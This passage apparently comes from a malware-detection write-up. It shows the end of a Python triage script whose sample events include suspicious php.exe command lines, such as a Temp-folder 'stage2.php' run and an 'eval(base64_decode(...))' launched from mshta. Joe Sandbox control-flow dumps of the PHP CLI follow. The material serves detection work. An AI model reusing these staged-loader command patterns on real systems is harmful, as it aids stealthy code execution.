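     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'"C:\Users\victim\AppData\Local\Temp\php\php.exe" C:\Users\victim\AppData\Local\Temp\php\stage2.php'},
    {"Image": r"C:\Users\victim\AppData\Local\Temp\php\php.exe",
     "ParentImage": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r'php.exe -r "eval(base64_decode($argv[1]));" aGVsbG8='},
    {"Image": r"C:\Program Files\PHP\php.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "php.exe -v"},
    {"Image": r"C:\Program Files\PHP\php.exe",
     "ParentImage": r"C:\Program Files\Jenkins\jenkins.exe",
     "CommandLine": r'"C:\Program Files\PHP\php.exe" -f C:\builds\site\artisan'},
    {"Image": r"C:\Users\victim\Downloads\php\php.exe",
     "ParentImage": r"C:\Windows\System32\wscript.exe",
     "CommandLine": r"C:\Users\victim\Downloads\php\php.exe"},
]


def run(events=SAMPLE_EVENTS):
    """Pair each event's command line with its triage reasons."""
    return [(e["CommandLine"], triage(e)) for e in events]


if __name__ == "__main__":
    for cmdline, reasons in run():
        print("ALERT" if reasons else "ok   ", cmdline, reasons)
```

The stdin case is the one worth keeping even though it is noisy in a developer environment: a php.exe launched with no operand from mshta or wscript is consistent with a script host piping the next stage into the interpreter, which leaves no script file on disk to hash. Tune SCRIPT_HOSTS and USER_WRITABLE to the estate before deploying the logic as a detection.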

                                                Control-flow Graph

                                                Function entry 7ff7498c1fc2, the php_getopt case that handles -R and -F ("You can use -R or -F only once.") and falls into the shared do_cli body at 7ff7498c1d80-7ff7498c2789. Graph data not reproducible as text; the blocks reach php_getopt, get_zend_version, php_printf, php_output_write, php_win32_console_is_own, php_request_startup, virtual_cwd_activate, virtual_fopen, zend_stream_init_fp, virtual_realpath, _strdup, zend_register_bool_constant, zend_is_auto_global, php_request_shutdown, zend_destroy_file_handle, sapi_deactivate, zend_ini_deactivate, _getpid, fflush and free, the same blocks as the 7ff7498c1b10 graph above.
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2894832736.00007FF7498C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7498C0000, based on PE: true
                                                • Associated: 00000018.00000002.2894785645.00007FF7498C0000.00000002.00000001.01000000.0000000F.sdmp
                                                • Associated: 00000018.00000002.2894913708.00007FF7498CD000.00000002.00000001.01000000.0000000F.sdmp
                                                • Associated: 00000018.00000002.2895019683.00007FF7498E1000.00000004.00000001.01000000.0000000F.sdmp
                                                • Associated: 00000018.00000002.2895069671.00007FF7498E4000.00000002.00000001.01000000.0000000F.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ff7498c0000_php.jbxd
                                                Similarity
                                                • API ID: __acrt_iob_func$_getpidfflushfprintffreephp_getoptphp_output_writephp_request_shutdownsapi_deactivatezend_destroy_file_handlezend_ini_deactivate
                                                • String ID: Could not open input file: %s$Either execute direct code, process stdin or use a file.$Finished execution, repeating...$You can use -R or -F only once.
                                                • API String ID: 3553338152-583370466
                                                • Opcode ID: 228b9956463f1bd849c5d356d7df22da3886abecfbf20f55fd4de07cdbb12e31
                                                • Instruction ID: 3ff49e7269127500e06dd498396f66df8ae9edb5bcb0f47a123a1dc49123ad1e
                                                • Opcode Fuzzy Hash: 228b9956463f1bd849c5d356d7df22da3886abecfbf20f55fd4de07cdbb12e31
                                                • Instruction Fuzzy Hash: 9F61F432A0CB46C6EB50BF29E444269E7B8FB44B94F944536DA4E437A8CF3CE464C720

                                                Control-flow Graph

                                                Function entry 7ff7498c2048, the php_getopt case that handles -r ("You can use -r only once.") and falls into the shared do_cli body at 7ff7498c1d80-7ff7498c2789. Graph data not reproducible as text; the API set is the same as for the 7ff7498c1fc2 entry above.
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2894832736.00007FF7498C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7498C0000, based on PE: true
                                                • Associated: 00000018.00000002.2894785645.00007FF7498C0000.00000002.00000001.01000000.0000000F.sdmp
                                                • Associated: 00000018.00000002.2894913708.00007FF7498CD000.00000002.00000001.01000000.0000000F.sdmp
                                                • Associated: 00000018.00000002.2895019683.00007FF7498E1000.00000004.00000001.01000000.0000000F.sdmp
                                                • Associated: 00000018.00000002.2895069671.00007FF7498E4000.00000002.00000001.01000000.0000000F.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ff7498c0000_php.jbxd
                                                Similarity
                                                • API ID: __acrt_iob_func$_getpidfflushfprintffreephp_getoptphp_output_writephp_request_shutdownsapi_deactivatezend_destroy_file_handlezend_ini_deactivate
                                                • String ID: Could not open input file: %s$Either execute direct code, process stdin or use a file.$Finished execution, repeating...$You can use -r only once.
                                                • API String ID: 3553338152-426040128
                                                • Opcode ID: d858a1e9502a77dbd96d191ea617b3bad5ef68b13e962244e103bb3bce0c4c19
                                                • Instruction ID: 62748c2835e93224e59e4677b39c42c418d5555a7c98f9da323c08c5ceeb1839
                                                • Opcode Fuzzy Hash: d858a1e9502a77dbd96d191ea617b3bad5ef68b13e962244e103bb3bce0c4c19
                                                • Instruction Fuzzy Hash: 6C61F632A0CB46C6EB50BF69E444269B7B8FB44B94F940536DA4E437A8CF3CE464C720

                                                Control-flow Graph

                                                Function entry 7ff7498c2097, a further php_getopt case of do_cli that joins the shared body at 7ff7498c1d80-7ff7498c2789. Graph data not reproducible as text; the API set is the same as for the 7ff7498c1fc2 and 7ff7498c2048 entries above.
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2894832736.00007FF7498C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7498C0000, based on PE: true
                                                • Associated: 00000018.00000002.2894785645.00007FF7498C0000.00000002.00000001.01000000.0000000F.sdmp
                                                • Associated: 00000018.00000002.2894913708.00007FF7498CD000.00000002.00000001.01000000.0000000F.sdmp
                                                • Associated: 00000018.00000002.2895019683.00007FF7498E1000.00000004.00000001.01000000.0000000F.sdmp
                                                • Associated: 00000018.00000002.2895069671.00007FF7498E4000.00000002.00000001.01000000.0000000F.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ff7498c0000_php.jbxd
                                                Similarity
                                                • API ID: __acrt_iob_func$_getpidfflushfprintffreephp_getoptphp_output_writephp_request_shutdownsapi_deactivatezend_destroy_file_handlezend_ini_deactivate
                                                • String ID: Could not open input file: %s$Either execute direct code, process stdin or use a file.$Finished execution, repeating...$You can use -R or -F only once.
                                                • API String ID: 3553338152-583370466
                                                • Opcode ID: 4eb3016f1b95f130a918f8364729c8162616cdff1726098edc066fbf7d43bfa0
                                                • Instruction ID: beac5c0a60257f04c78c224d1d662662fb3531d231667d4689b2bddf219e7827
                                                • Opcode Fuzzy Hash: 4eb3016f1b95f130a918f8364729c8162616cdff1726098edc066fbf7d43bfa0
                                                • Instruction Fuzzy Hash: AB610632A0CB46C6EB50BF69E444269B7B8FB44B94F944536DA4E437A8CF3CE464C720

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 476 7ff7498c20df-7ff7498c20e3 477 7ff7498c20e5-7ff7498c20e8 476->477 478 7ff7498c20fb-7ff7498c20ff 476->478 479 7ff7498c2106-7ff7498c211e 477->479 480 7ff7498c20ea-7ff7498c20f6 477->480 481 7ff7498c2101-7ff7498c2104 478->481 482 7ff7498c2167-7ff7498c2173 478->482 479->482 483 7ff7498c2275-7ff7498c22b6 php_getopt 479->483 480->483 481->479 481->482 482->483 484 7ff7498c1d80-7ff7498c1d86 483->484 485 7ff7498c22bc-7ff7498c22de 483->485 484->483 486 7ff7498c1d8c-7ff7498c1df6 get_zend_version php_printf sapi_deactivate 484->486 488 7ff7498c22e0 485->488 489 7ff7498c231c-7ff7498c231f 485->489 495 7ff7498c240e-7ff7498c2413 486->495 490 7ff7498c22e7-7ff7498c22ee 488->490 492 7ff7498c2321-7ff7498c232d php_win32_console_is_own 489->492 493 7ff7498c237b 489->493 490->490 494 7ff7498c22f0-7ff7498c2317 php_output_write 490->494 496 7ff7498c232f-7ff7498c2332 492->496 497 7ff7498c236c-7ff7498c2379 492->497 498 7ff7498c237f-7ff7498c2382 493->498 499 7ff7498c266f-7ff7498c2694 sapi_deactivate zend_ini_deactivate 494->499 501 7ff7498c241f-7ff7498c2425 495->501 502 7ff7498c2415-7ff7498c2419 zend_destroy_file_handle 495->502 496->497 500 7ff7498c2334-7ff7498c2337 496->500 497->498 503 7ff7498c2384-7ff7498c23a4 call 7ff7498c1060 __acrt_iob_func fflush 498->503 504 7ff7498c23a8-7ff7498c23ad 498->504 499->495 508 7ff7498c2339-7ff7498c2340 500->508 509 7ff7498c235d-7ff7498c236a 500->509 510 7ff7498c242f-7ff7498c2436 501->510 511 7ff7498c2427-7ff7498c2429 php_request_shutdown 501->511 502->501 503->504 506 7ff7498c23af-7ff7498c23e1 __acrt_iob_func call 7ff7498c1010 __acrt_iob_func fflush 504->506 507 7ff7498c23e6-7ff7498c23ea 504->507 526 7ff7498c24c2 506->526 514 7ff7498c24c6-7ff7498c24c9 507->514 508->509 515 7ff7498c2342-7ff7498c234f 508->515 509->498 516 7ff7498c2441-7ff7498c2446 510->516 517 7ff7498c2438-7ff7498c243b free 510->517 511->510 521 7ff7498c2506-7ff7498c2509 514->521 522 7ff7498c24cb-7ff7498c24ce 514->522 
515->497 523 7ff7498c2351-7ff7498c2355 515->523 518 7ff7498c2f15-7ff7498c2f53 call 7ff7498cbc30 516->518 519 7ff7498c244c-7ff7498c2455 _getpid 516->519 517->516 519->518 524 7ff7498c245b-7ff7498c24bd __acrt_iob_func call 7ff7498c1010 __acrt_iob_func fflush 519->524 528 7ff7498c250b-7ff7498c2524 virtual_cwd_activate virtual_fopen 521->528 530 7ff7498c2588-7ff7498c259a 521->530 527 7ff7498c24d0-7ff7498c24d7 522->527 522->528 523->497 529 7ff7498c2357-7ff7498c235b 523->529 524->526 526->514 527->521 535 7ff7498c24d9-7ff7498c24e6 527->535 536 7ff7498c2526-7ff7498c2536 php_printf 528->536 537 7ff7498c253b-7ff7498c2562 zend_stream_init_fp virtual_realpath 528->537 529->497 529->509 532 7ff7498c25c5-7ff7498c264f php_request_startup 530->532 533 7ff7498c259c-7ff7498c259f 530->533 542 7ff7498c2651-7ff7498c2664 php_output_write 532->542 543 7ff7498c2699-7ff7498c26f9 zend_register_bool_constant 532->543 533->532 541 7ff7498c25a1-7ff7498c25bd __acrt_iob_func zend_stream_init_fp 533->541 544 7ff7498c24f4-7ff7498c2502 535->544 545 7ff7498c24e8-7ff7498c24ec 535->545 546 7ff7498c266a 536->546 538 7ff7498c2564-7ff7498c2574 _strdup 537->538 539 7ff7498c2578-7ff7498c2586 537->539 538->539 547 7ff7498c25c1 539->547 541->547 542->546 549 7ff7498c273b-7ff7498c2773 zend_is_auto_global 543->549 550 7ff7498c26fb-7ff7498c26ff 543->550 544->521 545->544 548 7ff7498c24ee-7ff7498c24f2 545->548 546->499 547->532 548->521 548->544 551 7ff7498c23ef-7ff7498c2406 549->551 552 7ff7498c2779-7ff7498c2789 549->552 550->549 553 7ff7498c2701-7ff7498c2709 550->553 551->495 552->518 555 7ff7498c2710-7ff7498c271a 553->555 556 7ff7498c2720-7ff7498c2728 555->556 556->556 557 7ff7498c272a-7ff7498c2739 call 7ff7498cc942 556->557 557->549 557->555
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2894832736.00007FF7498C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7498C0000, based on PE: true
                                                • Associated: 00000018.00000002.2894785645.00007FF7498C0000.00000002.00000001.01000000.0000000F.sdmp
                                                • Associated: 00000018.00000002.2894913708.00007FF7498CD000.00000002.00000001.01000000.0000000F.sdmp
                                                • Associated: 00000018.00000002.2895019683.00007FF7498E1000.00000004.00000001.01000000.0000000F.sdmp
                                                • Associated: 00000018.00000002.2895069671.00007FF7498E4000.00000002.00000001.01000000.0000000F.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ff7498c0000_php.jbxd
                                                Similarity
                                                • API ID: __acrt_iob_func$_getpidfflushfprintffreephp_getoptphp_output_writephp_request_shutdownsapi_deactivatezend_destroy_file_handlezend_ini_deactivate
                                                • String ID: Could not open input file: %s$Either execute direct code, process stdin or use a file.$Finished execution, repeating...$You can use -B only once.
                                                • API String ID: 3553338152-505230959
                                                • Opcode ID: 0e10afefe438f06696547d0fbb4cf1a3cda0f398d36f10d9a67720a2f4a0b730
                                                • Instruction ID: 8026ea72d06633134997deb20648ba5d280510858825c21cf750969305f4f5dd
                                                • Opcode Fuzzy Hash: 0e10afefe438f06696547d0fbb4cf1a3cda0f398d36f10d9a67720a2f4a0b730
                                                • Instruction Fuzzy Hash: 6261F632A0CB46C6EB50BF29E444269B7B8FB44B94F944536DA4E437A8CF3CE464C720

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 560 7ff7498c2123-7ff7498c2127 561 7ff7498c213f-7ff7498c2143 560->561 562 7ff7498c2129-7ff7498c212c 560->562 565 7ff7498c2145-7ff7498c2148 561->565 566 7ff7498c2167-7ff7498c2173 561->566 563 7ff7498c214a-7ff7498c2162 562->563 564 7ff7498c212e-7ff7498c213a 562->564 567 7ff7498c2275-7ff7498c22b6 php_getopt 563->567 564->567 565->563 565->566 566->567 568 7ff7498c1d80-7ff7498c1d86 567->568 569 7ff7498c22bc-7ff7498c22de 567->569 568->567 570 7ff7498c1d8c-7ff7498c1df6 get_zend_version php_printf sapi_deactivate 568->570 572 7ff7498c22e0 569->572 573 7ff7498c231c-7ff7498c231f 569->573 579 7ff7498c240e-7ff7498c2413 570->579 574 7ff7498c22e7-7ff7498c22ee 572->574 576 7ff7498c2321-7ff7498c232d php_win32_console_is_own 573->576 577 7ff7498c237b 573->577 574->574 578 7ff7498c22f0-7ff7498c2317 php_output_write 574->578 580 7ff7498c232f-7ff7498c2332 576->580 581 7ff7498c236c-7ff7498c2379 576->581 582 7ff7498c237f-7ff7498c2382 577->582 583 7ff7498c266f-7ff7498c2694 sapi_deactivate zend_ini_deactivate 578->583 585 7ff7498c241f-7ff7498c2425 579->585 586 7ff7498c2415-7ff7498c2419 zend_destroy_file_handle 579->586 580->581 584 7ff7498c2334-7ff7498c2337 580->584 581->582 587 7ff7498c2384-7ff7498c23a4 call 7ff7498c1060 __acrt_iob_func fflush 582->587 588 7ff7498c23a8-7ff7498c23ad 582->588 583->579 592 7ff7498c2339-7ff7498c2340 584->592 593 7ff7498c235d-7ff7498c236a 584->593 594 7ff7498c242f-7ff7498c2436 585->594 595 7ff7498c2427-7ff7498c2429 php_request_shutdown 585->595 586->585 587->588 590 7ff7498c23af-7ff7498c23e1 __acrt_iob_func call 7ff7498c1010 __acrt_iob_func fflush 588->590 591 7ff7498c23e6-7ff7498c23ea 588->591 610 7ff7498c24c2 590->610 598 7ff7498c24c6-7ff7498c24c9 591->598 592->593 599 7ff7498c2342-7ff7498c234f 592->599 593->582 600 7ff7498c2441-7ff7498c2446 594->600 601 7ff7498c2438-7ff7498c243b free 594->601 595->594 605 7ff7498c2506-7ff7498c2509 598->605 606 7ff7498c24cb-7ff7498c24ce 598->606 599->581 607 
7ff7498c2351-7ff7498c2355 599->607 602 7ff7498c2f15-7ff7498c2f53 call 7ff7498cbc30 600->602 603 7ff7498c244c-7ff7498c2455 _getpid 600->603 601->600 603->602 608 7ff7498c245b-7ff7498c24bd __acrt_iob_func call 7ff7498c1010 __acrt_iob_func fflush 603->608 612 7ff7498c250b-7ff7498c2524 virtual_cwd_activate virtual_fopen 605->612 614 7ff7498c2588-7ff7498c259a 605->614 611 7ff7498c24d0-7ff7498c24d7 606->611 606->612 607->581 613 7ff7498c2357-7ff7498c235b 607->613 608->610 610->598 611->605 619 7ff7498c24d9-7ff7498c24e6 611->619 620 7ff7498c2526-7ff7498c2536 php_printf 612->620 621 7ff7498c253b-7ff7498c2562 zend_stream_init_fp virtual_realpath 612->621 613->581 613->593 616 7ff7498c25c5-7ff7498c264f php_request_startup 614->616 617 7ff7498c259c-7ff7498c259f 614->617 626 7ff7498c2651-7ff7498c2664 php_output_write 616->626 627 7ff7498c2699-7ff7498c26f9 zend_register_bool_constant 616->627 617->616 625 7ff7498c25a1-7ff7498c25bd __acrt_iob_func zend_stream_init_fp 617->625 628 7ff7498c24f4-7ff7498c2502 619->628 629 7ff7498c24e8-7ff7498c24ec 619->629 630 7ff7498c266a 620->630 622 7ff7498c2564-7ff7498c2574 _strdup 621->622 623 7ff7498c2578-7ff7498c2586 621->623 622->623 631 7ff7498c25c1 623->631 625->631 626->630 633 7ff7498c273b-7ff7498c2773 zend_is_auto_global 627->633 634 7ff7498c26fb-7ff7498c26ff 627->634 628->605 629->628 632 7ff7498c24ee-7ff7498c24f2 629->632 630->583 631->616 632->605 632->628 635 7ff7498c23ef-7ff7498c2406 633->635 636 7ff7498c2779-7ff7498c2789 633->636 634->633 637 7ff7498c2701-7ff7498c2709 634->637 635->579 636->602 639 7ff7498c2710-7ff7498c271a 637->639 640 7ff7498c2720-7ff7498c2728 639->640 640->640 641 7ff7498c272a-7ff7498c2739 call 7ff7498cc942 640->641 641->633 641->639
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2894832736.00007FF7498C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7498C0000, based on PE: true
                                                • Associated: 00000018.00000002.2894785645.00007FF7498C0000.00000002.00000001.01000000.0000000F.sdmp
                                                • Associated: 00000018.00000002.2894913708.00007FF7498CD000.00000002.00000001.01000000.0000000F.sdmp
                                                • Associated: 00000018.00000002.2895019683.00007FF7498E1000.00000004.00000001.01000000.0000000F.sdmp
                                                • Associated: 00000018.00000002.2895069671.00007FF7498E4000.00000002.00000001.01000000.0000000F.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ff7498c0000_php.jbxd
                                                Similarity
                                                • API ID: __acrt_iob_func$_getpidfflushfprintffreephp_getoptphp_output_writephp_request_shutdownsapi_deactivatezend_destroy_file_handlezend_ini_deactivate
                                                • String ID: Could not open input file: %s$Either execute direct code, process stdin or use a file.$Finished execution, repeating...$You can use -E only once.
                                                • API String ID: 3553338152-1668165687
                                                • Opcode ID: f75afcbd25c8002cd9d8841d2902f676d7587855860ac2f9678be31f560aebe2
                                                • Instruction ID: 8078ea3fbbcdf1952b023d645ecf158760e98bd7415e43da918100071e522426
                                                • Opcode Fuzzy Hash: f75afcbd25c8002cd9d8841d2902f676d7587855860ac2f9678be31f560aebe2
                                                • Instruction Fuzzy Hash: BB610732A0CB46C6EB50BF69E444269B7B8FB44B94F940536DA4E437A8CF3CE464C720

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 644 7ff7498c1f86-7ff7498c1f8e 645 7ff7498c1fa1-7ff7498c1fa4 644->645 646 7ff7498c1f90-7ff7498c1f9c 644->646 647 7ff7498c2275-7ff7498c22b6 php_getopt 645->647 648 7ff7498c1faa-7ff7498c1fae 645->648 646->647 651 7ff7498c1d80-7ff7498c1d86 647->651 652 7ff7498c22bc-7ff7498c22de 647->652 649 7ff7498c1fb4-7ff7498c1fbd 648->649 650 7ff7498c2167-7ff7498c2173 648->650 649->647 649->650 650->647 651->647 653 7ff7498c1d8c-7ff7498c1df6 get_zend_version php_printf sapi_deactivate 651->653 655 7ff7498c22e0 652->655 656 7ff7498c231c-7ff7498c231f 652->656 662 7ff7498c240e-7ff7498c2413 653->662 657 7ff7498c22e7-7ff7498c22ee 655->657 659 7ff7498c2321-7ff7498c232d php_win32_console_is_own 656->659 660 7ff7498c237b 656->660 657->657 661 7ff7498c22f0-7ff7498c2317 php_output_write 657->661 663 7ff7498c232f-7ff7498c2332 659->663 664 7ff7498c236c-7ff7498c2379 659->664 665 7ff7498c237f-7ff7498c2382 660->665 666 7ff7498c266f-7ff7498c2694 sapi_deactivate zend_ini_deactivate 661->666 668 7ff7498c241f-7ff7498c2425 662->668 669 7ff7498c2415-7ff7498c2419 zend_destroy_file_handle 662->669 663->664 667 7ff7498c2334-7ff7498c2337 663->667 664->665 670 7ff7498c2384-7ff7498c23a4 call 7ff7498c1060 __acrt_iob_func fflush 665->670 671 7ff7498c23a8-7ff7498c23ad 665->671 666->662 675 7ff7498c2339-7ff7498c2340 667->675 676 7ff7498c235d-7ff7498c236a 667->676 677 7ff7498c242f-7ff7498c2436 668->677 678 7ff7498c2427-7ff7498c2429 php_request_shutdown 668->678 669->668 670->671 673 7ff7498c23af-7ff7498c23e1 __acrt_iob_func call 7ff7498c1010 __acrt_iob_func fflush 671->673 674 7ff7498c23e6-7ff7498c23ea 671->674 693 7ff7498c24c2 673->693 681 7ff7498c24c6-7ff7498c24c9 674->681 675->676 682 7ff7498c2342-7ff7498c234f 675->682 676->665 683 7ff7498c2441-7ff7498c2446 677->683 684 7ff7498c2438-7ff7498c243b free 677->684 678->677 688 7ff7498c2506-7ff7498c2509 681->688 689 7ff7498c24cb-7ff7498c24ce 681->689 682->664 690 7ff7498c2351-7ff7498c2355 682->690 685 
7ff7498c2f15-7ff7498c2f53 call 7ff7498cbc30 683->685 686 7ff7498c244c-7ff7498c2455 _getpid 683->686 684->683 686->685 691 7ff7498c245b-7ff7498c24bd __acrt_iob_func call 7ff7498c1010 __acrt_iob_func fflush 686->691 695 7ff7498c250b-7ff7498c2524 virtual_cwd_activate virtual_fopen 688->695 697 7ff7498c2588-7ff7498c259a 688->697 694 7ff7498c24d0-7ff7498c24d7 689->694 689->695 690->664 696 7ff7498c2357-7ff7498c235b 690->696 691->693 693->681 694->688 702 7ff7498c24d9-7ff7498c24e6 694->702 703 7ff7498c2526-7ff7498c2536 php_printf 695->703 704 7ff7498c253b-7ff7498c2562 zend_stream_init_fp virtual_realpath 695->704 696->664 696->676 699 7ff7498c25c5-7ff7498c264f php_request_startup 697->699 700 7ff7498c259c-7ff7498c259f 697->700 709 7ff7498c2651-7ff7498c2664 php_output_write 699->709 710 7ff7498c2699-7ff7498c26f9 zend_register_bool_constant 699->710 700->699 708 7ff7498c25a1-7ff7498c25bd __acrt_iob_func zend_stream_init_fp 700->708 711 7ff7498c24f4-7ff7498c2502 702->711 712 7ff7498c24e8-7ff7498c24ec 702->712 713 7ff7498c266a 703->713 705 7ff7498c2564-7ff7498c2574 _strdup 704->705 706 7ff7498c2578-7ff7498c2586 704->706 705->706 714 7ff7498c25c1 706->714 708->714 709->713 716 7ff7498c273b-7ff7498c2773 zend_is_auto_global 710->716 717 7ff7498c26fb-7ff7498c26ff 710->717 711->688 712->711 715 7ff7498c24ee-7ff7498c24f2 712->715 713->666 714->699 715->688 715->711 718 7ff7498c23ef-7ff7498c2406 716->718 719 7ff7498c2779-7ff7498c2789 716->719 717->716 720 7ff7498c2701-7ff7498c2709 717->720 718->662 719->685 722 7ff7498c2710-7ff7498c271a 720->722 723 7ff7498c2720-7ff7498c2728 722->723 723->723 724 7ff7498c272a-7ff7498c2739 call 7ff7498cc942 723->724 724->716 724->722
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2894832736.00007FF7498C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7498C0000, based on PE: true
                                                • Associated: 00000018.00000002.2894785645.00007FF7498C0000.00000002.00000001.01000000.0000000F.sdmp
                                                • Associated: 00000018.00000002.2894913708.00007FF7498CD000.00000002.00000001.01000000.0000000F.sdmp
                                                • Associated: 00000018.00000002.2895019683.00007FF7498E1000.00000004.00000001.01000000.0000000F.sdmp
                                                • Associated: 00000018.00000002.2895069671.00007FF7498E4000.00000002.00000001.01000000.0000000F.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ff7498c0000_php.jbxd
                                                Similarity
                                                • API ID: __acrt_iob_func$_getpidfflushfprintffreephp_getoptphp_output_writephp_request_shutdownsapi_deactivatezend_destroy_file_handlezend_ini_deactivate
                                                • String ID: Could not open input file: %s$Either execute direct code, process stdin or use a file.$Finished execution, repeating...$Interactive shell (-a) requires the readline extension.
                                                • API String ID: 3553338152-3238503953
                                                • Opcode ID: 28e6316da42a0790e21ea5dbf0cbe5be1a67c08731897a8fb45388f4794f0680
                                                • Instruction ID: e6803d3d513de957184ad0677e50be847c939fb2d81e69fe6800580d09b3beaf
                                                • Opcode Fuzzy Hash: 28e6316da42a0790e21ea5dbf0cbe5be1a67c08731897a8fb45388f4794f0680
                                                • Instruction Fuzzy Hash: 31610722A0CB42C6EB50BF29E444269F7B8FB44B94F944536DA4E437A8CF3CE464D720

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 727 7ff7498c200b-7ff7498c2012 728 7ff7498c2018-7ff7498c201b 727->728 729 7ff7498c2167-7ff7498c2173 727->729 730 7ff7498c201d-7ff7498c2029 728->730 731 7ff7498c1ffc-7ff7498c2006 728->731 732 7ff7498c2275-7ff7498c22b6 php_getopt 729->732 730->729 730->732 731->732 733 7ff7498c20a7-7ff7498c20b3 731->733 734 7ff7498c1d80-7ff7498c1d86 732->734 735 7ff7498c22bc-7ff7498c22de 732->735 733->732 734->732 736 7ff7498c1d8c-7ff7498c1df6 get_zend_version php_printf sapi_deactivate 734->736 738 7ff7498c22e0 735->738 739 7ff7498c231c-7ff7498c231f 735->739 745 7ff7498c240e-7ff7498c2413 736->745 740 7ff7498c22e7-7ff7498c22ee 738->740 742 7ff7498c2321-7ff7498c232d php_win32_console_is_own 739->742 743 7ff7498c237b 739->743 740->740 744 7ff7498c22f0-7ff7498c2317 php_output_write 740->744 746 7ff7498c232f-7ff7498c2332 742->746 747 7ff7498c236c-7ff7498c2379 742->747 748 7ff7498c237f-7ff7498c2382 743->748 749 7ff7498c266f-7ff7498c2694 sapi_deactivate zend_ini_deactivate 744->749 751 7ff7498c241f-7ff7498c2425 745->751 752 7ff7498c2415-7ff7498c2419 zend_destroy_file_handle 745->752 746->747 750 7ff7498c2334-7ff7498c2337 746->750 747->748 753 7ff7498c2384-7ff7498c23a4 call 7ff7498c1060 __acrt_iob_func fflush 748->753 754 7ff7498c23a8-7ff7498c23ad 748->754 749->745 758 7ff7498c2339-7ff7498c2340 750->758 759 7ff7498c235d-7ff7498c236a 750->759 760 7ff7498c242f-7ff7498c2436 751->760 761 7ff7498c2427-7ff7498c2429 php_request_shutdown 751->761 752->751 753->754 756 7ff7498c23af-7ff7498c23e1 __acrt_iob_func call 7ff7498c1010 __acrt_iob_func fflush 754->756 757 7ff7498c23e6-7ff7498c23ea 754->757 776 7ff7498c24c2 756->776 764 7ff7498c24c6-7ff7498c24c9 757->764 758->759 765 7ff7498c2342-7ff7498c234f 758->765 759->748 766 7ff7498c2441-7ff7498c2446 760->766 767 7ff7498c2438-7ff7498c243b free 760->767 761->760 771 7ff7498c2506-7ff7498c2509 764->771 772 7ff7498c24cb-7ff7498c24ce 764->772 765->747 773 7ff7498c2351-7ff7498c2355 765->773 768 
7ff7498c2f15-7ff7498c2f53 call 7ff7498cbc30 766->768 769 7ff7498c244c-7ff7498c2455 _getpid 766->769 767->766 769->768 774 7ff7498c245b-7ff7498c24bd __acrt_iob_func call 7ff7498c1010 __acrt_iob_func fflush 769->774 778 7ff7498c250b-7ff7498c2524 virtual_cwd_activate virtual_fopen 771->778 780 7ff7498c2588-7ff7498c259a 771->780 777 7ff7498c24d0-7ff7498c24d7 772->777 772->778 773->747 779 7ff7498c2357-7ff7498c235b 773->779 774->776 776->764 777->771 785 7ff7498c24d9-7ff7498c24e6 777->785 786 7ff7498c2526-7ff7498c2536 php_printf 778->786 787 7ff7498c253b-7ff7498c2562 zend_stream_init_fp virtual_realpath 778->787 779->747 779->759 782 7ff7498c25c5-7ff7498c264f php_request_startup 780->782 783 7ff7498c259c-7ff7498c259f 780->783 792 7ff7498c2651-7ff7498c2664 php_output_write 782->792 793 7ff7498c2699-7ff7498c26f9 zend_register_bool_constant 782->793 783->782 791 7ff7498c25a1-7ff7498c25bd __acrt_iob_func zend_stream_init_fp 783->791 794 7ff7498c24f4-7ff7498c2502 785->794 795 7ff7498c24e8-7ff7498c24ec 785->795 796 7ff7498c266a 786->796 788 7ff7498c2564-7ff7498c2574 _strdup 787->788 789 7ff7498c2578-7ff7498c2586 787->789 788->789 797 7ff7498c25c1 789->797 791->797 792->796 799 7ff7498c273b-7ff7498c2773 zend_is_auto_global 793->799 800 7ff7498c26fb-7ff7498c26ff 793->800 794->771 795->794 798 7ff7498c24ee-7ff7498c24f2 795->798 796->749 797->782 798->771 798->794 801 7ff7498c23ef-7ff7498c2406 799->801 802 7ff7498c2779-7ff7498c2789 799->802 800->799 803 7ff7498c2701-7ff7498c2709 800->803 801->745 802->768 805 7ff7498c2710-7ff7498c271a 803->805 806 7ff7498c2720-7ff7498c2728 805->806 806->806 807 7ff7498c272a-7ff7498c2739 call 7ff7498cc942 806->807 807->799 807->805
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2894832736.00007FF7498C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7498C0000, based on PE: true
                                                • Associated: 00000018.00000002.2894785645.00007FF7498C0000.00000002.00000001.01000000.0000000F.sdmp
                                                • Associated: 00000018.00000002.2894913708.00007FF7498CD000.00000002.00000001.01000000.0000000F.sdmp
                                                • Associated: 00000018.00000002.2895019683.00007FF7498E1000.00000004.00000001.01000000.0000000F.sdmp
                                                • Associated: 00000018.00000002.2895069671.00007FF7498E4000.00000002.00000001.01000000.0000000F.sdmp
                                                Joe Sandbox IDA Plugin
